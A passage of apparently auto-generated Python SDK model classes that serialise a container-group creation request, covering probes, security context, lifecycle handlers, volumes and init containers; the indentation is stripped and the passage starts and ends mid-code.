self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
self.timeout_seconds = map.get('TimeoutSeconds')
if map.get('Exec') is not None:
temp_model = CreateContainerGroupRequestContainerReadinessProbeExec()
self.exec = temp_model.from_map(map['Exec'])
else:
self.exec = None
if map.get('TcpSocket') is not None:
temp_model = CreateContainerGroupRequestContainerReadinessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
return self
class CreateContainerGroupRequestContainerLivenessProbeHttpGet(TeaModel):
def __init__(self, path=None, port=None, scheme=None):
self.path = path
self.port = port
self.scheme = scheme
def validate(self):
pass
def to_map(self):
result = {}
result['Path'] = self.path
result['Port'] = self.port
result['Scheme'] = self.scheme
return result
def from_map(self, map={}):
self.path = map.get('Path')
self.port = map.get('Port')
self.scheme = map.get('Scheme')
return self
class CreateContainerGroupRequestContainerLivenessProbeExec(TeaModel):
def __init__(self, command=None):
self.command = []
def validate(self):
self.validate_required(self.command, 'command')
def to_map(self):
result = {}
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
return result
def from_map(self, map={}):
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
return self
class CreateContainerGroupRequestContainerLivenessProbeTcpSocket(TeaModel):
def __init__(self, port=None):
self.port = port
def validate(self):
pass
def to_map(self):
result = {}
result['Port'] = self.port
return result
def from_map(self, map={}):
self.port = map.get('Port')
return self
class CreateContainerGroupRequestContainerLivenessProbe(TeaModel):
def __init__(self, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None):
self.http_get = http_get
self.initial_delay_seconds = initial_delay_seconds
self.period_seconds = period_seconds
self.success_threshold = success_threshold
self.failure_threshold = failure_threshold
self.timeout_seconds = timeout_seconds
self.exec = exec
self.tcp_socket = tcp_socket
def validate(self):
self.validate_required(self.http_get, 'http_get')
if self.http_get:
self.http_get.validate()
self.validate_required(self.exec, 'exec')
if self.exec:
self.exec.validate()
self.validate_required(self.tcp_socket, 'tcp_socket')
if self.tcp_socket:
self.tcp_socket.validate()
def to_map(self):
result = {}
if self.http_get is not None:
result['HttpGet'] = self.http_get.to_map()
else:
result['HttpGet'] = None
result['InitialDelaySeconds'] = self.initial_delay_seconds
result['PeriodSeconds'] = self.period_seconds
result['SuccessThreshold'] = self.success_threshold
result['FailureThreshold'] = self.failure_threshold
result['TimeoutSeconds'] = self.timeout_seconds
if self.exec is not None:
result['Exec'] = self.exec.to_map()
else:
result['Exec'] = None
if self.tcp_socket is not None:
result['TcpSocket'] = self.tcp_socket.to_map()
else:
result['TcpSocket'] = None
return result
def from_map(self, map={}):
if map.get('HttpGet') is not None:
temp_model = CreateContainerGroupRequestContainerLivenessProbeHttpGet()
self.http_get = temp_model.from_map(map['HttpGet'])
else:
self.http_get = None
self.initial_delay_seconds = map.get('InitialDelaySeconds')
self.period_seconds = map.get('PeriodSeconds')
self.success_threshold = map.get('SuccessThreshold')
self.failure_threshold = map.get('FailureThreshold')
self.timeout_seconds = map.get('TimeoutSeconds')
if map.get('Exec') is not None:
temp_model = CreateContainerGroupRequestContainerLivenessProbeExec()
self.exec = temp_model.from_map(map['Exec'])
else:
self.exec = None
if map.get('TcpSocket') is not None:
temp_model = CreateContainerGroupRequestContainerLivenessProbeTcpSocket()
self.tcp_socket = temp_model.from_map(map['TcpSocket'])
else:
self.tcp_socket = None
return self
class CreateContainerGroupRequestContainerSecurityContextCapability(TeaModel):
def __init__(self, add=None):
self.add = []
def validate(self):
self.validate_required(self.add, 'add')
def to_map(self):
result = {}
result['Add'] = []
if self.add is not None:
for k in self.add:
result['Add'].append(k)
else:
result['Add'] = None
return result
def from_map(self, map={}):
self.add = []
if map.get('Add') is not None:
for k in map.get('Add'):
self.add.append(k)
else:
self.add = None
return self
class CreateContainerGroupRequestContainerSecurityContext(TeaModel):
def __init__(self, capability=None, read_only_root_filesystem=None, run_as_user=None):
self.capability = capability
self.read_only_root_filesystem = read_only_root_filesystem
self.run_as_user = run_as_user
def validate(self):
self.validate_required(self.capability, 'capability')
if self.capability:
self.capability.validate()
def to_map(self):
result = {}
if self.capability is not None:
result['Capability'] = self.capability.to_map()
else:
result['Capability'] = None
result['ReadOnlyRootFilesystem'] = self.read_only_root_filesystem
result['RunAsUser'] = self.run_as_user
return result
def from_map(self, map={}):
if map.get('Capability') is not None:
temp_model = CreateContainerGroupRequestContainerSecurityContextCapability()
self.capability = temp_model.from_map(map['Capability'])
else:
self.capability = None
self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
self.run_as_user = map.get('RunAsUser')
return self
class CreateContainerGroupRequestContainerLifecyclePostStartHandlerHttpGetHttpHeader(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class CreateContainerGroupRequestContainerLifecyclePreStopHandlerHttpGetHttpHeader(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
result['Value'] = self.value
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.value = map.get('Value')
return self
class CreateContainerGroupRequestContainer(TeaModel):
def __init__(self, image=None, name=None, cpu=None, memory=None, working_dir=None, image_pull_policy=None, command=None, arg=None, volume_mount=None, port=None, environment_var=None, readiness_probe=None, liveness_probe=None, security_context=None, stdin=None, stdin_once=None, tty=None, gpu=None, lifecycle_post_start_handler_http_get_host=None, lifecycle_post_start_handler_http_get_port=None, lifecycle_post_start_handler_http_get_path=None, lifecycle_post_start_handler_http_get_scheme=None, lifecycle_post_start_handler_http_get_http_header=None, lifecycle_post_start_handler_exec=None, lifecycle_post_start_handler_tcp_socket_host=None, lifecycle_post_start_handler_tcp_socket_port=None, lifecycle_pre_stop_handler_http_get_host=None, lifecycle_pre_stop_handler_http_get_port=None, lifecycle_pre_stop_handler_http_get_path=None, lifecycle_pre_stop_handler_http_get_scheme=None, lifecycle_pre_stop_handler_http_get_http_header=None, lifecycle_pre_stop_handler_exec=None, lifecycle_pre_stop_handler_tcp_socket_host=None, lifecycle_pre_stop_handler_tcp_socket_port=None, termination_message_path=None, termination_message_policy=None):
self.image = image
self.name = name
self.cpu = cpu
self.memory = memory
self.working_dir = working_dir
self.image_pull_policy = image_pull_policy
self.command = []
self.arg = []
self.volume_mount = []
self.port = []
self.environment_var = []
self.readiness_probe = readiness_probe
self.liveness_probe = liveness_probe
self.security_context = security_context
self.stdin = stdin
self.stdin_once = stdin_once
self.tty = tty
self.gpu = gpu
self.lifecycle_post_start_handler_http_get_host = lifecycle_post_start_handler_http_get_host
self.lifecycle_post_start_handler_http_get_port = lifecycle_post_start_handler_http_get_port
self.lifecycle_post_start_handler_http_get_path = lifecycle_post_start_handler_http_get_path
self.lifecycle_post_start_handler_http_get_scheme = lifecycle_post_start_handler_http_get_scheme
self.lifecycle_post_start_handler_http_get_http_header = []
self.lifecycle_post_start_handler_exec = []
self.lifecycle_post_start_handler_tcp_socket_host = lifecycle_post_start_handler_tcp_socket_host
self.lifecycle_post_start_handler_tcp_socket_port = lifecycle_post_start_handler_tcp_socket_port
self.lifecycle_pre_stop_handler_http_get_host = lifecycle_pre_stop_handler_http_get_host
self.lifecycle_pre_stop_handler_http_get_port = lifecycle_pre_stop_handler_http_get_port
self.lifecycle_pre_stop_handler_http_get_path = lifecycle_pre_stop_handler_http_get_path
self.lifecycle_pre_stop_handler_http_get_scheme = lifecycle_pre_stop_handler_http_get_scheme
self.lifecycle_pre_stop_handler_http_get_http_header = []
self.lifecycle_pre_stop_handler_exec = []
self.lifecycle_pre_stop_handler_tcp_socket_host = lifecycle_pre_stop_handler_tcp_socket_host
self.lifecycle_pre_stop_handler_tcp_socket_port = lifecycle_pre_stop_handler_tcp_socket_port
self.termination_message_path = termination_message_path
self.termination_message_policy = termination_message_policy
def validate(self):
self.validate_required(self.image, 'image')
self.validate_required(self.name, 'name')
if self.volume_mount:
for k in self.volume_mount:
if k :
k.validate()
if self.port:
for k in self.port:
if k :
k.validate()
if self.environment_var:
for k in self.environment_var:
if k :
k.validate()
self.validate_required(self.readiness_probe, 'readiness_probe')
if self.readiness_probe:
self.readiness_probe.validate()
self.validate_required(self.liveness_probe, 'liveness_probe')
if self.liveness_probe:
self.liveness_probe.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
if self.lifecycle_post_start_handler_http_get_http_header:
for k in self.lifecycle_post_start_handler_http_get_http_header:
if k :
k.validate()
if self.lifecycle_pre_stop_handler_http_get_http_header:
for k in self.lifecycle_pre_stop_handler_http_get_http_header:
if k :
k.validate()
def to_map(self):
result = {}
result['Image'] = self.image
result['Name'] = self.name
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['WorkingDir'] = self.working_dir
result['ImagePullPolicy'] = self.image_pull_policy
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Arg'] = []
if self.arg is not None:
for k in self.arg:
result['Arg'].append(k)
else:
result['Arg'] = None
result['VolumeMount'] = []
if self.volume_mount is not None:
for k in self.volume_mount:
result['VolumeMount'].append(k.to_map() if k else None)
else:
result['VolumeMount'] = None
result['Port'] = []
if self.port is not None:
for k in self.port:
result['Port'].append(k.to_map() if k else None)
else:
result['Port'] = None
result['EnvironmentVar'] = []
if self.environment_var is not None:
for k in self.environment_var:
result['EnvironmentVar'].append(k.to_map() if k else None)
else:
result['EnvironmentVar'] = None
if self.readiness_probe is not None:
result['ReadinessProbe'] = self.readiness_probe.to_map()
else:
result['ReadinessProbe'] = None
if self.liveness_probe is not None:
result['LivenessProbe'] = self.liveness_probe.to_map()
else:
result['LivenessProbe'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['Stdin'] = self.stdin
result['StdinOnce'] = self.stdin_once
result['Tty'] = self.tty
result['Gpu'] = self.gpu
result['LifecyclePostStartHandlerHttpGetHost'] = self.lifecycle_post_start_handler_http_get_host
result['LifecyclePostStartHandlerHttpGetPort'] = self.lifecycle_post_start_handler_http_get_port
result['LifecyclePostStartHandlerHttpGetPath'] = self.lifecycle_post_start_handler_http_get_path
result['LifecyclePostStartHandlerHttpGetScheme'] = self.lifecycle_post_start_handler_http_get_scheme
result['LifecyclePostStartHandlerHttpGetHttpHeader'] = []
if self.lifecycle_post_start_handler_http_get_http_header is not None:
for k in self.lifecycle_post_start_handler_http_get_http_header:
result['LifecyclePostStartHandlerHttpGetHttpHeader'].append(k.to_map() if k else None)
else:
result['LifecyclePostStartHandlerHttpGetHttpHeader'] = None
result['LifecyclePostStartHandlerExec'] = []
if self.lifecycle_post_start_handler_exec is not None:
for k in self.lifecycle_post_start_handler_exec:
result['LifecyclePostStartHandlerExec'].append(k)
else:
result['LifecyclePostStartHandlerExec'] = None
result['LifecyclePostStartHandlerTcpSocketHost'] = self.lifecycle_post_start_handler_tcp_socket_host
result['LifecyclePostStartHandlerTcpSocketPort'] = self.lifecycle_post_start_handler_tcp_socket_port
result['LifecyclePreStopHandlerHttpGetHost'] = self.lifecycle_pre_stop_handler_http_get_host
result['LifecyclePreStopHandlerHttpGetPort'] = self.lifecycle_pre_stop_handler_http_get_port
result['LifecyclePreStopHandlerHttpGetPath'] = self.lifecycle_pre_stop_handler_http_get_path
result['LifecyclePreStopHandlerHttpGetScheme'] = self.lifecycle_pre_stop_handler_http_get_scheme
result['LifecyclePreStopHandlerHttpGetHttpHeader'] = []
if self.lifecycle_pre_stop_handler_http_get_http_header is not None:
for k in self.lifecycle_pre_stop_handler_http_get_http_header:
result['LifecyclePreStopHandlerHttpGetHttpHeader'].append(k.to_map() if k else None)
else:
result['LifecyclePreStopHandlerHttpGetHttpHeader'] = None
result['LifecyclePreStopHandlerExec'] = []
if self.lifecycle_pre_stop_handler_exec is not None:
for k in self.lifecycle_pre_stop_handler_exec:
result['LifecyclePreStopHandlerExec'].append(k)
else:
result['LifecyclePreStopHandlerExec'] = None
result['LifecyclePreStopHandlerTcpSocketHost'] = self.lifecycle_pre_stop_handler_tcp_socket_host
result['LifecyclePreStopHandlerTcpSocketPort'] = self.lifecycle_pre_stop_handler_tcp_socket_port
result['TerminationMessagePath'] = self.termination_message_path
result['TerminationMessagePolicy'] = self.termination_message_policy
return result
def from_map(self, map={}):
self.image = map.get('Image')
self.name = map.get('Name')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.working_dir = map.get('WorkingDir')
self.image_pull_policy = map.get('ImagePullPolicy')
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.arg = []
if map.get('Arg') is not None:
for k in map.get('Arg'):
self.arg.append(k)
else:
self.arg = None
self.volume_mount = []
if map.get('VolumeMount') is not None:
for k in map.get('VolumeMount'):
temp_model = CreateContainerGroupRequestContainerVolumeMount()
temp_model = temp_model.from_map(k)
self.volume_mount.append(temp_model)
else:
self.volume_mount = None
self.port = []
if map.get('Port') is not None:
for k in map.get('Port'):
temp_model = CreateContainerGroupRequestContainerPort()
temp_model = temp_model.from_map(k)
self.port.append(temp_model)
else:
self.port = None
self.environment_var = []
if map.get('EnvironmentVar') is not None:
for k in map.get('EnvironmentVar'):
temp_model = CreateContainerGroupRequestContainerEnvironmentVar()
temp_model = temp_model.from_map(k)
self.environment_var.append(temp_model)
else:
self.environment_var = None
if map.get('ReadinessProbe') is not None:
temp_model = CreateContainerGroupRequestContainerReadinessProbe()
self.readiness_probe = temp_model.from_map(map['ReadinessProbe'])
else:
self.readiness_probe = None
if map.get('LivenessProbe') is not None:
temp_model = CreateContainerGroupRequestContainerLivenessProbe()
self.liveness_probe = temp_model.from_map(map['LivenessProbe'])
else:
self.liveness_probe = None
if map.get('SecurityContext') is not None:
temp_model = CreateContainerGroupRequestContainerSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.stdin = map.get('Stdin')
self.stdin_once = map.get('StdinOnce')
self.tty = map.get('Tty')
self.gpu = map.get('Gpu')
self.lifecycle_post_start_handler_http_get_host = map.get('LifecyclePostStartHandlerHttpGetHost')
self.lifecycle_post_start_handler_http_get_port = map.get('LifecyclePostStartHandlerHttpGetPort')
self.lifecycle_post_start_handler_http_get_path = map.get('LifecyclePostStartHandlerHttpGetPath')
self.lifecycle_post_start_handler_http_get_scheme = map.get('LifecyclePostStartHandlerHttpGetScheme')
self.lifecycle_post_start_handler_http_get_http_header = []
if map.get('LifecyclePostStartHandlerHttpGetHttpHeader') is not None:
for k in map.get('LifecyclePostStartHandlerHttpGetHttpHeader'):
temp_model = CreateContainerGroupRequestContainerLifecyclePostStartHandlerHttpGetHttpHeader()
temp_model = temp_model.from_map(k)
self.lifecycle_post_start_handler_http_get_http_header.append(temp_model)
else:
self.lifecycle_post_start_handler_http_get_http_header = None
self.lifecycle_post_start_handler_exec = []
if map.get('LifecyclePostStartHandlerExec') is not None:
for k in map.get('LifecyclePostStartHandlerExec'):
self.lifecycle_post_start_handler_exec.append(k)
else:
self.lifecycle_post_start_handler_exec = None
self.lifecycle_post_start_handler_tcp_socket_host = map.get('LifecyclePostStartHandlerTcpSocketHost')
self.lifecycle_post_start_handler_tcp_socket_port = map.get('LifecyclePostStartHandlerTcpSocketPort')
self.lifecycle_pre_stop_handler_http_get_host = map.get('LifecyclePreStopHandlerHttpGetHost')
self.lifecycle_pre_stop_handler_http_get_port = map.get('LifecyclePreStopHandlerHttpGetPort')
self.lifecycle_pre_stop_handler_http_get_path = map.get('LifecyclePreStopHandlerHttpGetPath')
self.lifecycle_pre_stop_handler_http_get_scheme = map.get('LifecyclePreStopHandlerHttpGetScheme')
self.lifecycle_pre_stop_handler_http_get_http_header = []
if map.get('LifecyclePreStopHandlerHttpGetHttpHeader') is not None:
for k in map.get('LifecyclePreStopHandlerHttpGetHttpHeader'):
temp_model = CreateContainerGroupRequestContainerLifecyclePreStopHandlerHttpGetHttpHeader()
temp_model = temp_model.from_map(k)
self.lifecycle_pre_stop_handler_http_get_http_header.append(temp_model)
else:
self.lifecycle_pre_stop_handler_http_get_http_header = None
self.lifecycle_pre_stop_handler_exec = []
if map.get('LifecyclePreStopHandlerExec') is not None:
for k in map.get('LifecyclePreStopHandlerExec'):
self.lifecycle_pre_stop_handler_exec.append(k)
else:
self.lifecycle_pre_stop_handler_exec = None
self.lifecycle_pre_stop_handler_tcp_socket_host = map.get('LifecyclePreStopHandlerTcpSocketHost')
self.lifecycle_pre_stop_handler_tcp_socket_port = map.get('LifecyclePreStopHandlerTcpSocketPort')
self.termination_message_path = map.get('TerminationMessagePath')
self.termination_message_policy = map.get('TerminationMessagePolicy')
return self
class CreateContainerGroupRequestVolumeNFSVolume(TeaModel):
def __init__(self, server=None, path=None, read_only=None):
self.server = server
self.path = path
self.read_only = read_only
def validate(self):
pass
def to_map(self):
result = {}
result['Server'] = self.server
result['Path'] = self.path
result['ReadOnly'] = self.read_only
return result
def from_map(self, map={}):
self.server = map.get('Server')
self.path = map.get('Path')
self.read_only = map.get('ReadOnly')
return self
class CreateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath(TeaModel):
def __init__(self, content=None, path=None, mode=None):
self.content = content
self.path = path
self.mode = mode
def validate(self):
pass
def to_map(self):
result = {}
result['Content'] = self.content
result['Path'] = self.path
result['Mode'] = self.mode
return result
def from_map(self, map={}):
self.content = map.get('Content')
self.path = map.get('Path')
self.mode = map.get('Mode')
return self
class CreateContainerGroupRequestVolumeConfigFileVolume(TeaModel):
def __init__(self, config_file_to_path=None, default_mode=None):
self.config_file_to_path = []
self.default_mode = default_mode
def validate(self):
self.validate_required(self.config_file_to_path, 'config_file_to_path')
if self.config_file_to_path:
for k in self.config_file_to_path:
if k :
k.validate()
def to_map(self):
result = {}
result['ConfigFileToPath'] = []
if self.config_file_to_path is not None:
for k in self.config_file_to_path:
result['ConfigFileToPath'].append(k.to_map() if k else None)
else:
result['ConfigFileToPath'] = None
result['DefaultMode'] = self.default_mode
return result
def from_map(self, map={}):
self.config_file_to_path = []
if map.get('ConfigFileToPath') is not None:
for k in map.get('ConfigFileToPath'):
temp_model = CreateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath()
temp_model = temp_model.from_map(k)
self.config_file_to_path.append(temp_model)
else:
self.config_file_to_path = None
self.default_mode = map.get('DefaultMode')
return self
class CreateContainerGroupRequestVolumeEmptyDirVolume(TeaModel):
def __init__(self, medium=None):
self.medium = medium
def validate(self):
pass
def to_map(self):
result = {}
result['Medium'] = self.medium
return result
def from_map(self, map={}):
self.medium = map.get('Medium')
return self
class CreateContainerGroupRequestVolumeDiskVolume(TeaModel):
def __init__(self, disk_id=None, fs_type=None, disk_size=None):
self.disk_id = disk_id
self.fs_type = fs_type
self.disk_size = disk_size
def validate(self):
pass
def to_map(self):
result = {}
result['DiskId'] = self.disk_id
result['FsType'] = self.fs_type
result['DiskSize'] = self.disk_size
return result
def from_map(self, map={}):
self.disk_id = map.get('DiskId')
self.fs_type = map.get('FsType')
self.disk_size = map.get('DiskSize')
return self
class CreateContainerGroupRequestVolumeFlexVolume(TeaModel):
def __init__(self, driver=None, fs_type=None, options=None):
self.driver = driver
self.fs_type = fs_type
self.options = options
def validate(self):
pass
def to_map(self):
result = {}
result['Driver'] = self.driver
result['FsType'] = self.fs_type
result['Options'] = self.options
return result
def from_map(self, map={}):
self.driver = map.get('Driver')
self.fs_type = map.get('FsType')
self.options = map.get('Options')
return self
class CreateContainerGroupRequestVolumeHostPathVolume(TeaModel):
def __init__(self, type=None, path=None):
self.type = type
self.path = path
def validate(self):
pass
def to_map(self):
result = {}
result['Type'] = self.type
result['Path'] = self.path
return result
def from_map(self, map={}):
self.type = map.get('Type')
self.path = map.get('Path')
return self
class CreateContainerGroupRequestVolume(TeaModel):
def __init__(self, name=None, nfsvolume=None, config_file_volume=None, type=None, empty_dir_volume=None, disk_volume=None, flex_volume=None, host_path_volume=None):
self.name = name
self.nfsvolume = nfsvolume
self.config_file_volume = config_file_volume
self.type = type
self.empty_dir_volume = empty_dir_volume
self.disk_volume = disk_volume
self.flex_volume = flex_volume
self.host_path_volume = host_path_volume
def validate(self):
self.validate_required(self.nfsvolume, 'nfsvolume')
if self.nfsvolume:
self.nfsvolume.validate()
self.validate_required(self.config_file_volume, 'config_file_volume')
if self.config_file_volume:
self.config_file_volume.validate()
self.validate_required(self.empty_dir_volume, 'empty_dir_volume')
if self.empty_dir_volume:
self.empty_dir_volume.validate()
self.validate_required(self.disk_volume, 'disk_volume')
if self.disk_volume:
self.disk_volume.validate()
self.validate_required(self.flex_volume, 'flex_volume')
if self.flex_volume:
self.flex_volume.validate()
self.validate_required(self.host_path_volume, 'host_path_volume')
if self.host_path_volume:
self.host_path_volume.validate()
def to_map(self):
result = {}
result['Name'] = self.name
if self.nfsvolume is not None:
result['NFSVolume'] = self.nfsvolume.to_map()
else:
result['NFSVolume'] = None
if self.config_file_volume is not None:
result['ConfigFileVolume'] = self.config_file_volume.to_map()
else:
result['ConfigFileVolume'] = None
result['Type'] = self.type
if self.empty_dir_volume is not None:
result['EmptyDirVolume'] = self.empty_dir_volume.to_map()
else:
result['EmptyDirVolume'] = None
if self.disk_volume is not None:
result['DiskVolume'] = self.disk_volume.to_map()
else:
result['DiskVolume'] = None
if self.flex_volume is not None:
result['FlexVolume'] = self.flex_volume.to_map()
else:
result['FlexVolume'] = None
if self.host_path_volume is not None:
result['HostPathVolume'] = self.host_path_volume.to_map()
else:
result['HostPathVolume'] = None
return result
def from_map(self, map={}):
self.name = map.get('Name')
if map.get('NFSVolume') is not None:
temp_model = CreateContainerGroupRequestVolumeNFSVolume()
self.nfsvolume = temp_model.from_map(map['NFSVolume'])
else:
self.nfsvolume = None
if map.get('ConfigFileVolume') is not None:
temp_model = CreateContainerGroupRequestVolumeConfigFileVolume()
self.config_file_volume = temp_model.from_map(map['ConfigFileVolume'])
else:
self.config_file_volume = None
self.type = map.get('Type')
if map.get('EmptyDirVolume') is not None:
temp_model = CreateContainerGroupRequestVolumeEmptyDirVolume()
self.empty_dir_volume = temp_model.from_map(map['EmptyDirVolume'])
else:
self.empty_dir_volume = None
if map.get('DiskVolume') is not None:
temp_model = CreateContainerGroupRequestVolumeDiskVolume()
self.disk_volume = temp_model.from_map(map['DiskVolume'])
else:
self.disk_volume = None
if map.get('FlexVolume') is not None:
temp_model = CreateContainerGroupRequestVolumeFlexVolume()
self.flex_volume = temp_model.from_map(map['FlexVolume'])
else:
self.flex_volume = None
if map.get('HostPathVolume') is not None:
temp_model = CreateContainerGroupRequestVolumeHostPathVolume()
self.host_path_volume = temp_model.from_map(map['HostPathVolume'])
else:
self.host_path_volume = None
return self
class CreateContainerGroupRequestInitContainerVolumeMount(TeaModel):
def __init__(self, mount_path=None, read_only=None, name=None, sub_path=None):
self.mount_path = mount_path
self.read_only = read_only
self.name = name
self.sub_path = sub_path
def validate(self):
pass
def to_map(self):
result = {}
result['MountPath'] = self.mount_path
result['ReadOnly'] = self.read_only
result['Name'] = self.name
result['SubPath'] = self.sub_path
return result
def from_map(self, map={}):
self.mount_path = map.get('MountPath')
self.read_only = map.get('ReadOnly')
self.name = map.get('Name')
self.sub_path = map.get('SubPath')
return self
class CreateContainerGroupRequestInitContainerPort(TeaModel):
def __init__(self, protocol=None, port=None):
self.protocol = protocol
self.port = port
def validate(self):
pass
def to_map(self):
result = {}
result['Protocol'] = self.protocol
result['Port'] = self.port
return result
def from_map(self, map={}):
self.protocol = map.get('Protocol')
self.port = map.get('Port')
return self
class CreateContainerGroupRequestInitContainerEnvironmentVarFieldRef(TeaModel):
def __init__(self, field_path=None):
self.field_path = field_path
def validate(self):
pass
def to_map(self):
result = {}
result['FieldPath'] = self.field_path
return result
def from_map(self, map={}):
self.field_path = map.get('FieldPath')
return self
class CreateContainerGroupRequestInitContainerEnvironmentVar(TeaModel):
def __init__(self, key=None, value=None, field_ref=None):
self.key = key
self.value = value
self.field_ref = field_ref
def validate(self):
self.validate_required(self.field_ref, 'field_ref')
if self.field_ref:
self.field_ref.validate()
def to_map(self):
result = {}
result['Key'] = self.key
result['Value'] = self.value
if self.field_ref is not None:
result['FieldRef'] = self.field_ref.to_map()
else:
result['FieldRef'] = None
return result
def from_map(self, map={}):
self.key = map.get('Key')
self.value = map.get('Value')
if map.get('FieldRef') is not None:
temp_model = CreateContainerGroupRequestInitContainerEnvironmentVarFieldRef()
self.field_ref = temp_model.from_map(map['FieldRef'])
else:
self.field_ref = None
return self
class CreateContainerGroupRequestInitContainerSecurityContextCapability(TeaModel):
def __init__(self, add=None):
self.add = []
def validate(self):
self.validate_required(self.add, 'add')
def to_map(self):
result = {}
result['Add'] = []
if self.add is not None:
for k in self.add:
result['Add'].append(k)
else:
result['Add'] = None
return result
def from_map(self, map={}):
self.add = []
if map.get('Add') is not None:
for k in map.get('Add'):
self.add.append(k)
else:
self.add = None
return self
class CreateContainerGroupRequestInitContainerSecurityContext(TeaModel):
def __init__(self, capability=None, read_only_root_filesystem=None, run_as_user=None):
self.capability = capability
self.read_only_root_filesystem = read_only_root_filesystem
self.run_as_user = run_as_user
def validate(self):
self.validate_required(self.capability, 'capability')
if self.capability:
self.capability.validate()
def to_map(self):
result = {}
if self.capability is not None:
result['Capability'] = self.capability.to_map()
else:
result['Capability'] = None
result['ReadOnlyRootFilesystem'] = self.read_only_root_filesystem
result['RunAsUser'] = self.run_as_user
return result
def from_map(self, map={}):
if map.get('Capability') is not None:
temp_model = CreateContainerGroupRequestInitContainerSecurityContextCapability()
self.capability = temp_model.from_map(map['Capability'])
else:
self.capability = None
self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
self.run_as_user = map.get('RunAsUser')
return self
class CreateContainerGroupRequestInitContainer(TeaModel):
def __init__(self, name=None, image=None, cpu=None, memory=None, working_dir=None, image_pull_policy=None, command=None, arg=None, volume_mount=None, port=None, environment_var=None, security_context=None, gpu=None, termination_message_path=None, termination_message_policy=None):
self.name = name
self.image = image
self.cpu = cpu
self.memory = memory
self.working_dir = working_dir
self.image_pull_policy = image_pull_policy
self.command = []
self.arg = []
self.volume_mount = []
self.port = []
self.environment_var = []
self.security_context = security_context
self.gpu = gpu
self.termination_message_path = termination_message_path
self.termination_message_policy = termination_message_policy
def validate(self):
self.validate_required(self.command, 'command')
self.validate_required(self.arg, 'arg')
self.validate_required(self.volume_mount, 'volume_mount')
if self.volume_mount:
for k in self.volume_mount:
if k :
k.validate()
self.validate_required(self.port, 'port')
if self.port:
for k in self.port:
if k :
k.validate()
self.validate_required(self.environment_var, 'environment_var')
if self.environment_var:
for k in self.environment_var:
if k :
k.validate()
self.validate_required(self.security_context, 'security_context')
if self.security_context:
self.security_context.validate()
def to_map(self):
result = {}
result['Name'] = self.name
result['Image'] = self.image
result['Cpu'] = self.cpu
result['Memory'] = self.memory
result['WorkingDir'] = self.working_dir
result['ImagePullPolicy'] = self.image_pull_policy
result['Command'] = []
if self.command is not None:
for k in self.command:
result['Command'].append(k)
else:
result['Command'] = None
result['Arg'] = []
if self.arg is not None:
for k in self.arg:
result['Arg'].append(k)
else:
result['Arg'] = None
result['VolumeMount'] = []
if self.volume_mount is not None:
for k in self.volume_mount:
result['VolumeMount'].append(k.to_map() if k else None)
else:
result['VolumeMount'] = None
result['Port'] = []
if self.port is not None:
for k in self.port:
result['Port'].append(k.to_map() if k else None)
else:
result['Port'] = None
result['EnvironmentVar'] = []
if self.environment_var is not None:
for k in self.environment_var:
result['EnvironmentVar'].append(k.to_map() if k else None)
else:
result['EnvironmentVar'] = None
if self.security_context is not None:
result['SecurityContext'] = self.security_context.to_map()
else:
result['SecurityContext'] = None
result['Gpu'] = self.gpu
result['TerminationMessagePath'] = self.termination_message_path
result['TerminationMessagePolicy'] = self.termination_message_policy
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.image = map.get('Image')
self.cpu = map.get('Cpu')
self.memory = map.get('Memory')
self.working_dir = map.get('WorkingDir')
self.image_pull_policy = map.get('ImagePullPolicy')
self.command = []
if map.get('Command') is not None:
for k in map.get('Command'):
self.command.append(k)
else:
self.command = None
self.arg = []
if map.get('Arg') is not None:
for k in map.get('Arg'):
self.arg.append(k)
else:
self.arg = None
self.volume_mount = []
if map.get('VolumeMount') is not None:
for k in map.get('VolumeMount'):
temp_model = CreateContainerGroupRequestInitContainerVolumeMount()
temp_model = temp_model.from_map(k)
self.volume_mount.append(temp_model)
else:
self.volume_mount = None
self.port = []
if map.get('Port') is not None:
for k in map.get('Port'):
temp_model = CreateContainerGroupRequestInitContainerPort()
temp_model = temp_model.from_map(k)
self.port.append(temp_model)
else:
self.port = None
self.environment_var = []
if map.get('EnvironmentVar') is not None:
for k in map.get('EnvironmentVar'):
temp_model = CreateContainerGroupRequestInitContainerEnvironmentVar()
temp_model = temp_model.from_map(k)
self.environment_var.append(temp_model)
else:
self.environment_var = None
if map.get('SecurityContext') is not None:
temp_model = CreateContainerGroupRequestInitContainerSecurityContext()
self.security_context = temp_model.from_map(map['SecurityContext'])
else:
self.security_context = None
self.gpu = map.get('Gpu')
self.termination_message_path = map.get('TerminationMessagePath')
self.termination_message_policy = map.get('TerminationMessagePolicy')
return self
class CreateContainerGroupRequestDnsConfigOption(TeaModel):
def __init__(self, name=None, value=None):
self.name = name
self.value = value
def validate(self):
pass
def to_map(self):
result = {}
result['Name'] = self.name
